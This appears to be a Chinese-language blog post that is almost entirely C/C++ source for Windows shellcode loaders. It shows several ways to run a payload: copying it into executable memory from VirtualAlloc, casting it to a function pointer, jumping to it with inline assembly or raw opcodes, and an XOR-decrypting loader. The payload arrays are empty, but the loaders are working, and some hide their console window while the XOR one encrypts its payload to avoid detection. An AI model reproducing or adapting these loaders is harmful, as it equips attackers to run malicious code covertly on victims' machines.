C/C++
利用动态申请内存
#include <windows.h>
#include <stdio.h>
typedef void (_stdcall *CODE)();
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";
void main()
{
PVOID p = NULL;
p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (p == NULL)
{
return;
}
memcpy(p, shellcode, sizeof(shellcode));
CODE code = (CODE)p;
code();
}
强制类型转换成函数指针
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] ="";
void main()
{
((void(WINAPI*)(void))&shellcode)();
}
嵌入式汇编呼叫shellcode
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
__asm
{
mov eax, offset shellcode
jmp eax
}
}
伪指令
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
__asm
{
mov eax, offset shellcode
_emit 0xFF
_emit 0xE0
}
}
xor加密
/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/
#include "stdafx.h"
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
char encryptedShellcode[] = "";
char key[] = "uknowsec";
char cipherType[] = "xor";
// Char array to host the deciphered shellcode
char shellcode[sizeof encryptedShellcode];
// XOR decoding stub using the key defined above must be the same as the encoding key
int j = 0;
for (int i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}
// Allocating memory with EXECUTE writes
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copying deciphered shellcode into memory as a function
memcpy(exec, shellcode, sizeof shellcode);
// Call the shellcode
((void(*)())exec)();
}
阅读:276976 | 评论:0 | 标签:shellcode shell
